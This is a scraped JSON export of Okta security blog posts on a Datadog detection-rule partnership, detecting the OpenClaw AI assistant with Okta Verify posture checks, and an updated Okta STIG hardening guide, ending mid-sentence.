Greg Foss is a cybersecurity leader with over 15 years of experience spanning threat research, security operations, and offensive security. As the Engineering Manager of Threat Detection Engineering at Datadog, he leads a team of elite threat hunters and detection engineers, developing cutting-edge defenses against sophisticated cloud-native intrusions by nation-state and criminally motivated adversaries.
"},"node_locale":"en","image":null,"sec_okta_com___blog_post":null},"allContentfulSecOktaComBlogPost":{"nodes":[{"slug":"/articles/2026/03/datadog-okta-collaboration","id":"8b19761b-a165-57cf-976e-de2261679e95","title":"Datadog and Okta Combine for New Customer Detections","date":"2026-03-07T12:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Comprehensive monitoring of identity activity is crucial to the security of any organization. A compromised identity can lead to widespread data breaches and significant financial loss. However, the challenge for many security teams is that effective detection engineering has historically required significant manual effort and dedicated resources. Analysts are required to observe techniques used for identity-based attacks and then write, test and optimize detections for their Security Information Event Management (SIEM) or logging platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Cyber Defense team is at the forefront of identity attacks, observing and developing new detections and reducing customers’ operational burden. This work is also powering security product innovations such as Okta \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/en-au/products/identity-threat-protection/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Identity Threat Protection\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (ITP), which continually assesses user sessions using the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/identity-security/oktas-commitment-to-caep-and-ssf-pioneering-secure-interoperable-identity-standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" standard and enabling new security automation capabilities. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To further assist Okta customers, in May 2025 we took a foundational step and released the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Security Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", a repository of detection queries and preventative configurations designed to empower Okta customers to proactively identify and prevent potential security threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Today we are announcing a collaboration with the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://securitylabs.datadoghq.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Security Research team at Datadog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to make it even easier to implement these detections.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Together, we have enhanced the Out-of-the-Box (OotB) detection capabilities of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.datadoghq.com/product/cloud-siem/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Datadog’s Cloud SIEM\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" by including rules from the Okta Security Detection Catalog. These rules have been engineered to enable the identification of identity-related threats with minimal configuration. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Crucially, this partnership is bi-directional. The enhanced logic developed by Datadog’s own Security Research team during this collaboration has been contributed back to the public \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Security Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", ensuring that the broader security community benefits from this joint research regardless of their tooling. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This integration goes beyond simple logging; it utilizes signal correlation, combining multiple signals from Okta’s system log, Identity Threat Protection, and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ThreatInsights\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", to provide higher fidelity detections and reduce false positives.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Getting Started\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"These new detection rules are available now in Datadog Cloud SIEM, with plans to add new rules over time. Developed in collaboration between the Okta Detection and Response team and Datadog Security Engineers, these rules can be configured and run directly within the Datadog platform for any organization that ingests Okta System Log events.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For those who are not Datadog customers, we have ensured this collaboration benefits the wider community as well. All foundational logic developed during this partnership has been contributed back to the public Okta Security Detection Catalog. This allows security teams using other SIEM platforms to review, adapt, and deploy these high-value detections within their own environments.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Preview The New Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" View Datadog’s Out-of-the-Box Default Rules for Okta here.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Ingest Okta System Logs:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Follow the instructions here to integrate Okta with your Datadog instance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Enable the New Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Ensure the Okta customer detections are active within your Datadog environment.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Review Alerting Policies:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Customize alerting thresholds and notification channels to fit your organisation's needs.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"New Detection Rule Highlights\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To give you an idea of the capabilities now available, here are a few examples of the new rules and the specific identity threats they help detect:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta OAuth mismatched URI\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tactic:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Credential Access\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Technique:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Steal Application Access Token (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1528/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1528\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors failed OAuth access token grant activity where the provided reason is \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"mismatched_redirect_uri.\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Alert severity is increased if Okta’s provided \\\"threat suspected\\\" field evaluates to true. This is critical for detecting adversaries leveraging phishing infrastructure; they may attempt to compromise users by issuing redirects to a phishing domain during the OAuth flow.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta policy rule modified to downgrade MFA\\nTactic: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Defense Evasion\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nTechnique: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Modify Authentication Process: Multi-Factor Authentication (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1556/006/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1556.006\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nDescription: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors when an administrator updates an Okta policy rule (indicated by a policy.rule.update event). When the previous policy logic did not contain 1FA but the updated logic does, an alert will trigger. A higher‑severity alert is generated when the source IP address has been classified as suspicious or malicious. Downgrading multi-factor authentication (MFA) requirements reduces security posture and can be used by an attacker to maintain persistence or facilitate account compromise via social engineering.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta phone number assigned to multiple users\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tactic:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Persistence\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Technique:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Account Manipulation: Device Registration (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1098/005/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1098.005\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors phone number enrollment verification by SMS within a short period. The reuse of a single phone number across multiple user accounts is a strong indicator of an attacker trying to maintain persistence or enroll a controlled device across compromised accounts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta temporary password granted and MFA reset\\nTactic: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Persistence\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nTechnique: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Account Manipulation (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1098/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1098\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\") \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors Okta account recovery and factor administration events, alerting when both user.account.expire_password and user.mfa.factor.reset_all succeed for the same account. When an administrator expires a user password, they may generate a temporary password which an attacker can use to login and set their own. If factors are also reset, the attacker can register their own MFA devices. This behavior is a strong signal of account takeover, especially when stemming from uncommon locations or hosting provider IP addresses.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Conclusion\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In a decentralized cloud environment, identity sprawl can quickly lead to chaos. Okta brings structure to this landscape by centralizing access, provisioning, and governance across an organization’s entire application stack.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Because Okta is the chosen platform for protecting access to these critical resources, administrative access to Okta must be treated as highly privileged. Just as you monitor your most sensitive infrastructure, monitoring the platform that governs access to it is a fundamental security practice.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Together, Okta and Datadog enable organizations to safeguard this centralized control point, arming security teams with the high-fidelity signals and pre-built intelligence needed to detect and respond to threats at scale in real-time.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Resources:\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta Security Detection Catalog:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://github.com/okta/customer-detections\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Okta Identity Threat Protection:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/en-au/products/identity-threat-protection/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://www.okta.com/en-au/products/identity-threat-protection/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Datadog Default Rules for Okta:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://docs.datadoghq.com/security/default_rules/?search=okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://docs.datadoghq.com/security/default_rules/?search=okta\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"\\nDatadog Cloud SIEM: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.datadoghq.com/product/cloud-siem/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://www.datadoghq.com/product/cloud-siem/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta and Datadog have collaborated to enhance the Out-of-the-Box (OotB) detection capabilities of Datadog’s Cloud SIEM by including rules from the Okta Security Detection Catalog. These rules have been engineered to enable the identification of identity-related threats with minimal configuration. "},"updatedAt":"2026-03-11T13:00:15.369Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"},{"id":"9f195fb3-2707-5759-a818-4a417280f582","bio":{"bio":"Tom is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent two decades in the security industry and is an expert at intrusion research, incident response and engineering secure systems, which he’s demonstrated at Okta, TikTok, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, previously volunteering as a SANS teaching assistant. He enjoys researching the latest trends in adversary tactics and sharing his findings through security research blogs and conference talks.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/il6yytExKSSeXHdwvwkpR/b957a8aaf8f9fa7ec963bb62b6d9e289/tom.png"},"name":"Tom Simpson","jobTitle":"Staff Detection and Response Engineer","slug":"tom-simpson","node_locale":"en"},{"id":"cdd9fb32-226d-558d-a986-4084b4f3dc5a","bio":{"bio":"Jordan is a cybersecurity leader specialising in security operations, threat intelligence, and security engineering. With a career in technology that began as a teen, Jordan brings nearly two decades of experience to his role as a Senior Manager within Okta’s Cyber Defense team. He leads an expert group of engineers dedicated to building the defenses and response capabilities required to promptly identify, contain, and evict advanced persistent threats from Okta’s environment.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4LyCQIOujOjDJDzFjU7aSW/c09849ac8281c32a39dd5d30d58078b2/jordan.jpg"},"name":"Jordan Ruocco","jobTitle":"Senior Manager, Okta Cyber Defense Team","slug":"jordan-ruocco","node_locale":"en"},{"id":"95387d00-f345-53e4-b163-89443cfea8d0","bio":{"bio":"Julie Agnes Sparks is a Senior Security Engineer in the Security Research organization at Datadog. Julie has previous experience on detection and response teams at Brex and Cloudflare with a focus on how to identify attacks, help the organization stay on top of emerging threats, and mature detection processes. She prioritizes involvement and connection in the security community and mentoring women who are entering the field.
"},"image":null,"name":"Julie Agnes Sparks","jobTitle":"Senior Security Engineer, Security Research, Datadog","slug":"julie-agnes-sparks","node_locale":"en"},{"id":"060f5c6d-61f5-53b8-b144-1da729bb97cb","bio":{"bio":"Greg Foss is a cybersecurity leader with over 15 years of experience spanning threat research, security operations, and offensive security. As the Engineering Manager of Threat Detection Engineering at Datadog, he leads a team of elite threat hunters and detection engineers, developing cutting-edge defenses against sophisticated cloud-native intrusions by nation-state and criminally motivated adversaries.
"},"image":null,"name":"Greg Foss","jobTitle":"Engineering Manager, Threat Detection Engineering, Datadog","slug":"greg-foss","node_locale":"en"}]},{"slug":"/articles/2026/02/st-detecting-openclaw","id":"17eb06f7-1bbf-5303-bb7f-0ac37dbfd11a","title":"Detecting OpenClaw at Sign-In","date":"2026-02-11T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If like most organizations you are still coming to grips with the implications of what personal AI assistants like OpenClaw mean for your security posture, you might need to at least identify where they are being used.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Turns out Okta Verify can do that for you.\\n\\nAdvanced posture checks is an early access feature in the Okta Verify client that gives administrators the ability to write custom rules that evaluate device hygiene at sign-in. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Administrators can write simple osquery checks that evaluate, for example:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persistant services and installed apps\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Currently running processes\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The presence of configuration files and binaries in common installation paths.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Installs of Homebrew or npm packages\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Listening ports\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Docker images and artifacts \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"There are multiple ways you can apply this to something like OpenClaw, and lots of good reasons to do it.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"A personal AI assistant doesn’t need to be malicious or vulnerable for you to want to wrap some policy around its use on corporate-issued devices. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"blockquote\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For a list of sample queries relevant to OpenClaw, head over to the Okta Threat Intelligence blog:\\n\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/threat-intelligence/detecting-openclaw-advanced-posture-checks/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://www.okta.com/blog/threat-intelligence/detecting-openclaw-advanced-posture-checks/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta Verify has a neat trick under the hood that can help you identify the use of personal AI assistants and other \"not just yet\" software."},"updatedAt":"2026-02-11T04:22:55.937Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2026/02/okta-STIG-hardening-nhi","id":"31baf94f-abf3-5a6b-8ce1-032050f45ce2","title":"Okta Hardening Guide Updated to Secure Non-Human Identities","date":"2026-02-03T08:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is proud to announce the latest version (1.1) of the Okta Security Technical Implementation Guide (STIG), which provides U.S. government agencies additional security hardening recommendations related to network security and non-human identities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First published by Okta and the U.S. Defense Information Systems Agency (DISA) in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/oktas-new-stig/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the Okta Identity as a Service (IDaaS) STIG provides instrumental hardening guidance for identity and security practitioners.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The new checks introduced in version 1.1 are critical for securing service accounts, integrations, users, automation, and AI agents. This updated guidance provides security mitigations in addition to protocols like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/rfc9449\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DPoP\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/integrations/cross-app-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cross App Access\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the updated version of the STIG, we introduce five new checks. These checks are important in the efforts to protect NHI use cases as well as aligning with the latest version of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.mil/dccs/dccs-documents\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DoD Cloud Computing Security Requirements Guide (CC SRG)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". One update to the CC SRG is: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Section 5.9.3.1\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“…PaaS/SaaS offerings must ensure that exposing any allowlisted services does not enable all Mission Owner or tenants internet facing access by default. This can be accomplished through implementing internal firewall rules, proxies or other solutions that are compatible with the CSOs specific infrastructure and offerings.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For commercial entities reading this, it essentially means don’t open your services to the internet by default. Our updated guidance provides the checks to help lock down access by IP, IP Range, or Geographic location. In addition to the network restrictions, we added a check to help block ‘anonymized proxies’, which are often a source of malicious traffic. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FedRAMP Program Management Office (PMO) requires Cloud Service Providers (CSPs) to provide “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.fedramp.gov/docs/rev5/balance/recommended-secure-configuration/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Secure Configuration\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” related to their service offerings. The Okta IDaaS STIG is Okta’s “Recommended Secure Configuration.” The benefit of doing a STIG is the additional independent validation and assessment provided by DISA. Our collaboration with DISA has been extremely valuable. We share the mission of helping our customers become as secure as possible. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Commercial customers should take a risk-based approach to determine which STIGs to apply. We understand that commercial CSPs and vendors will often pursue maximum compatibility for customers, nevertheless these additional checks can be used for all privileged access (administrative and NHI) use cases. These are the kinds of checks that Okta leveraged to help prevent attacks, such as the recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/newsroom/articles/the-salesloft-incident--a-wake-up-call-for-saas-security-and-ips/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Salesloft Drift\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and 